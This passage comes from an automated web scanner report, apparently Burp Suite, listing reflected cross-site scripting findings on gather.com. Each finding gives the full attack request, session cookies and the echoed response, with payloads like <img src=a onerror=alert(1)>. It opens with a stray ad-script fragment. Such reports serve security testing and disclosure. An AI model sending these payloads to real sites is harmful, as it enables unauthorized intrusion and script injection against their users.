//Look to see if we have set them before the dat file
var CHRON_url = 'stamfordadvocate.com/beda0';f3e70677a7b';
CHRON_query ? OAS_query=CHRON_query : OAS_query = '';

/* set up the yahoo context targets */
adwiz.yahoo.context.tier = '0';
adwiz.yahoo.context.tag = 'Nil';
adwiz.yahoo.context.category = 'Nil';
/
...[SNIP]...
4.331. http://www.gather.com/426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gather.com
Path:   /426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag attribute. The payload 8a5a0><img%20src%3da%20onerror%3dalert(1)>ada81faa594 was submitted in the REST URL parameter 1. This input was echoed as 8a5a0><img src=a onerror=alert(1)>ada81faa594 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /426d8%3Cimg+src8a5a0><img%20src%3da%20onerror%3dalert(1)>ada81faa594=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d HTTP/1.1
Host: www.gather.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/12
Cookie: gathersid=1025; ref=direct_www; __utma=185998783.481654380.1316295856.1316295856.1316295856.1; __utmb=185998783.2.10.1316295856; __utmc=185998783; __utmz=185998783.1316295856.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; JSESSIONID=7D0289D9CFA30C47BDC64A59981FBAD1; vis=uNYzOQs1IZ5oyxdbD7V4NADBAJMPjbko1GpsqdeX97e3OXGAKiKOQnzi9JIbB5FPPDPGWSOmhkGSHc26F35QPbfU6cjwhBowFwFyN5J548WK04yVTSDXC+8B6N5ntJgz; __qca=P0-1020474271-1316295803759

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:06:29 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Content-Length: 17735
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<img src8a5a0><img src=a onerror=alert(1)>ada81faa594=a onerror=alert("XSS")>
...[SNIP]...
4.332. http://www.gather.com/426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gather.com
Path:   /426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c43"><a>0ac9066e76d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /426d8%3Cimg+srcf3c43"><a>0ac9066e76d=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d HTTP/1.1
Host: www.gather.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/12
Cookie: gathersid=1025; ref=direct_www; __utma=185998783.481654380.1316295856.1316295856.1316295856.1; __utmb=185998783.2.10.1316295856; __utmc=185998783; __utmz=185998783.1316295856.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; JSESSIONID=7D0289D9CFA30C47BDC64A59981FBAD1; vis=uNYzOQs1IZ5oyxdbD7V4NADBAJMPjbko1GpsqdeX97e3OXGAKiKOQnzi9JIbB5FPPDPGWSOmhkGSHc26F35QPbfU6cjwhBowFwFyN5J548WK04yVTSDXC+8B6N5ntJgz; __qca=P0-1020474271-1316295803759

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:06:29 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Content-Length: 17630
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<img+srcf3c43"><a>0ac9066e76d=a+onerror=alert("XSS")>
...[SNIP]...
4.333. http://www.gather.com/426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gather.com
Path:   /426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 88332<img%20src%3da%20onerror%3dalert(1)>5af3d5c7fa9 was submitted in the REST URL parameter 1. This input was echoed as 88332<img src=a onerror=alert(1)>5af3d5c7fa9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /88332<img%20src%3da%20onerror%3dalert(1)>5af3d5c7fa9=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d HTTP/1.1
Host: www.gather.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/12
Cookie: gathersid=1025; ref=direct_www; __utma=185998783.481654380.1316295856.1316295856.1316295856.1; __utmb=185998783.2.10.1316295856; __utmc=185998783; __utmz=185998783.1316295856.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; JSESSIONID=7D0289D9CFA30C47BDC64A59981FBAD1; vis=uNYzOQs1IZ5oyxdbD7V4NADBAJMPjbko1GpsqdeX97e3OXGAKiKOQnzi9JIbB5FPPDPGWSOmhkGSHc26F35QPbfU6cjwhBowFwFyN5J548WK04yVTSDXC+8B6N5ntJgz; __qca=P0-1020474271-1316295803759

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:06:51 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Content-Length: 17693
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<em>88332<img src=a onerror=alert(1)>5af3d5c7fa9=a onerror=alert("XSS")>
...[SNIP]...
4.334. http://www.gather.com/URI+SYNTAX+EXCEPTION [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gather.com
Path:   /URI+SYNTAX+EXCEPTION

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4a5f2<img%20src%3da%20onerror%3dalert(1)>b0b1634c427 was submitted in the REST URL parameter 1. This input was echoed as 4a5f2<img src=a onerror=alert(1)>b0b1634c427 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /URI+SYNTAX+EXCEPTION4a5f2<img%20src%3da%20onerror%3dalert(1)>b0b1634c427 HTTP/1.1
Host: www.gather.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: gathersid=www06; ref=direct_www; __utma=185998783.1950058045.1316295781.1316295781.1316295781.1; __utmb=185998783.1.10.1316295781; __utmc=185998783; __utmz=185998783.1316295781.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; JSESSIONID=642B4580EDE3E511BE324FC3053BDCDC

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:05:14 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Content-Length: 17654
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<em>URI SYNTAX EXCEPTION4a5f2<img src=a onerror=alert(1)>b0b1634c427</em>
...[SNIP]...
4.335. http://www.gather.com/URI+SYNTAX+EXCEPTION [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gather.com
Path:   /URI+SYNTAX+EXCEPTION

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c01df"><a>6fe6341d71f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /URI+SYNTAX+EXCEPTIONc01df"><a>6fe6341d71f HTTP/1.1
Host: www.gather.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: gathersid=www06; ref=direct_www; __utma=185998783.1950058045.1316295781.1316295781.1316295781.1; __utmb=185998783.1.10.1316295781; __utmc=185998783; __utmz=185998783.1316295781.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; JSESSIONID=642B4580EDE3E511BE324FC3053BDCDC

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:04:52 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Content-Length: 17569
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<meta name="keywordVal" content="URI+SYNTAX+EXCEPTIONc01df"><a>6fe6341d71f" >
...[SNIP]...
4.336. http://www.gather.com/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gather.com
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9de96<img%20src%3da%20onerror%3dalert(1)>92c1f05fba6 was submitted in the REST URL parameter 1. This input was echoed as 9de96<img src=a onerror=alert(1)>92c1f05fba6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /a9de96<img%20src%3da%20onerror%3dalert(1)>92c1f05fba6 HTTP/1.1
Host: www.gather.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: gathersid=www06; ref=direct_www; __utma=185998783.1950058045.1316295781.1316295781.1316295781.1; __utmb=185998783.1.10.1316295781; __utmc=185998783; __utmz=185998783.1316295781.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:05:18 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Content-Length: 17597
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<em>a9de96<img src=a onerror=alert(1)>92c1f05fba6</em>
...[SNIP]...
4.337. http://www.gather.com/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gather.com
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79f87"><a>bbf6706713b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /a79f87"><a>bbf6706713b HTTP/1.1
Host: www.gather.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: gathersid=www06; ref=direct_www; __utma=185998783.1950058045.1316295781.1316295781.1316295781.1; __utmb=185998783.1.10.1316295781; __utmc=185998783; __utmz=185998783.1316295781.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:04:52 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Content-Length: 17512
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<meta name="keywordVal" content="a79f87"><a>bbf6706713b" >
...[SNIP]...
4.338. http://www.gather.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gather.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c006e"><a>6572eb5d1d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /c006e"><a>6572eb5d1d4 HTTP/1.1
Host: www.gather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0E4D838206BDB859EE02307D40936463; vis=NHlt+Lk5IZ3dxgr1zkbTl8TLnORF3qkd0LfP/8B7QAiD3p8la3P/7EGo6KG91aOe2Hyf1U+5+OJj+x4v6P757yEro+IXWkIi7xRVJTV8tC3VPlJZjj46fM56l5aedSs7; gathersid=www06; ref=direct_www; __utma=93515714.1205581913.1316294759.1316294759.1316294759.1; __utmb=93515714.1.10.1316294759; __utmc=93515714; __utmz=93515714.1316294759.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; __qca=P0-2006040109-1316294758931

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:35:50 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Content-Length: 17544
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<meta name="keywordVal" content="c006e"><a>6572eb5d1d4" >
...[SNIP]...
4.339. http://www.gather.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gather.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f755c<img%20src%3da%20onerror%3dalert(1)>36794888b6b was submitted in the REST URL parameter 1. This input was echoed as f755c<img src=a onerror=alert(1)>36794888b6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /f755c<img%20src%3da%20onerror%3dalert(1)>36794888b6b HTTP/1.1
Host: www.gather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0E4D838206BDB859EE02307D40936463; vis=NHlt+Lk5IZ3dxgr1zkbTl8TLnORF3qkd0LfP/8B7QAiD3p8la3P/7EGo6KG91aOe2Hyf1U+5+OJj+x4v6P757yEro+IXWkIi7xRVJTV8tC3VPlJZjj46fM56l5aedSs7; gathersid=www06; ref=direct_www; __utma=93515714.1205581913.1316294759.1316294759.1316294759.1; __utmb=93515714.1.10.1316294759; __utmc=93515714; __utmz=93515714.1316294759.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; __qca=P0-2006040109-1316294758931

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:36:13 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Content-Length: 17629
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<em>f755c<img src=a onerror=alert(1)>36794888b6b</em>
...[SNIP]...
4.340. http://www.gather.com/global_andre.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gather.com
Path:   /global_andre.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4e35"><a>c331bbb36fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /b4e35"><a>c331bbb36fa?18212 HTTP/1.1
Host: www.gather.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: gathersid=www06; ref=direct_www; __utma=185998783.1950058045.1316295781.1316295781.1316295781.1; __utmb=185998783.1.10.1316295781; __utmc=185998783; __utmz=185998783.1316295781.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:06:36 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Content-Length: 17517
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<meta name="keywordVal" content="b4e35"><a>c331bbb36fa" >
...[SNIP]...
4.341. http://www.gather.com/global_andre.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gather.com
Path:   /global_andre.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1912d<img%20src%3da%20onerror%3dalert(1)>8bb8bcb5fc0 was submitted in the REST URL parameter 1. This input was echoed as 1912d<img src=a onerror=alert(1)>8bb8bcb5fc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /1912d<img%20src%3da%20onerror%3dalert(1)>8bb8bcb5fc0?18212 HTTP/1.1
Host: www.gather.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: gathersid=www06; ref=direct_www; __utma=185998783.1950058045.1316295781.1316295781.1316295781.1; __utmb=185998783.1.10.1316295781; __utmc=185998783; __utmz=185998783.1316295781.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:06:58 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Content-Length: 17594
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<em>1912d<img src=a onerror=alert(1)>8bb8bcb5fc0</em>
...[SNIP]...
4.342. http://www.gather.com/peopleAreTalking.action [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gather.com
Path:   /peopleAreTalking.action

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e7c9"><a>d307891a060 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /4e7c9"><a>d307891a060 HTTP/1.1
Host: www.gather.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
Content-Length: 87
Origin: http://www.gather.com
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0E4D838206BDB859EE02307D40936463; vis=NHlt+Lk5IZ3dxgr1zkbTl8TLnORF3qkd0LfP/8B7QAiD3p8la3P/7EGo6KG91aOe2Hyf1U+5+OJj+x4v6P757yEro+IXWkIi7xRVJTV8tC3VPlJZjj46fM56l5aedSs7; gathersid=www06; ref=direct_www; __utma=93515714.1205581913.1316294759.1316294759.1316294759.1; __utmb=93515714.1.10.1316294759; __utmc=93515714; __utmz=93515714.1316294759.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; __qca=P0-2006040109-1316294758931

recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:37:02 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Content-Length: 17544
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<meta name="keywordVal" content="4e7c9"><a>d307891a060" >
...[SNIP]...
4.343. http://www.gather.com/peopleAreTalking.action [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gather.com
Path:   /peopleAreTalking.action

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 426d8<img%20src%3da%20onerror%3dalert(1)>31b7c6065d67ada9d was submitted in the REST URL parameter 1. This input was echoed as 426d8<img src=a onerror=alert(1)>31b7c6065d67ada9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /426d8<img%20src%3da%20onerror%3dalert(1)>31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_= HTTP/1.1
Host: www.gather.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
Origin: http://www.gather.com
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0E4D838206BDB859EE02307D40936463; vis=NHlt+Lk5IZ3dxgr1zkbTl8TLnORF3qkd0LfP/8B7QAiD3p8la3P/7EGo6KG91aOe2Hyf1U+5+OJj+x4v6P757yEro+IXWkIi7xRVJTV8tC3VPlJZjj46fM56l5aedSs7; gathersid=www06; ref=direct_www; __utma=93515714.1205581913.1316294759.1316294759.1316294759.1; __utmb=93515714.1.10.1316294759; __utmc=93515714; __utmz=93515714.1316294759.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; __qca=P0-2006040109-1316294758931

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:37:24 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Content-Length: 17647
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
